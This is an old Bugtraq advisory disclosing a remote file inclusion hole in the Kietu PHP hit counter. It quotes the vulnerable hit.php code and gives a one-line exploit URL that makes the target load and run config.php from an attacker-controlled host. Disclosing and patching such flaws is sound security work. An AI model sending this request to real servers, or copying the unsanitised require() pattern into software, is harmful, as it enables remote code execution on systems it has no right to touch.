[28924] in bugtraq
Kietu ( PHP )
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Feb 18 11:47:12 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sat, 15 Feb 2003 10:38:40 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F96zNLt5FcqafBDrqS600013f5b@hotmail.com>
Informations :
°°°°°°°°°°°°°°
Website : http://kietu.free.fr
Version : 2.0, 2.3
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
hit.php :
------------------------------------------------------------------
if (!get_cfg_var("register_globals")) {
$kietu["remote_addr"] = $HTTP_SERVER_VARS["REMOTE_ADDR"];
$kietu["http_user_agent"] = $HTTP_SERVER_VARS["HTTP_USER_AGENT"];
$kietu["website"] = $HTTP_GET_VARS["website"];
$kietu["appel"] = $HTTP_GET_VARS["appel"];
$kietu["http_referer"] = $HTTP_SERVER_VARS["HTTP_REFERER"];
$kietu["php_self"] = $HTTP_SERVER_VARS["PHP_SELF"];
$kietu["url_hit"] = $HTTP_GET_VARS["url_hit"].$url_hit;
}
else {
$kietu["remote_addr"] = $REMOTE_ADDR;
$kietu["http_user_agent"] = $HTTP_USER_AGENT;
$kietu["website"] = $website;
$kietu["appel"] = $appel;
$kietu["http_referer"] = $HTTP_REFERER;
$kietu["php_self"] = $PHP_SELF;
$kietu["url_hit"] = $url_hit;
}
require ($kietu["url_hit"]."config.php");
------------------------------------------------------------------
Exploit :
°°°°°°°°°
http://[target]/hit.php?url_hit=http://[attacker]/
with :
http://[attacker]/config.php
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.org
More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools
This hole was published in "the Hackademy Journal 01", october 2002
(http://www.dmpfrance.com).
frog-m@n
_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous !
http://search.fr.msn.be
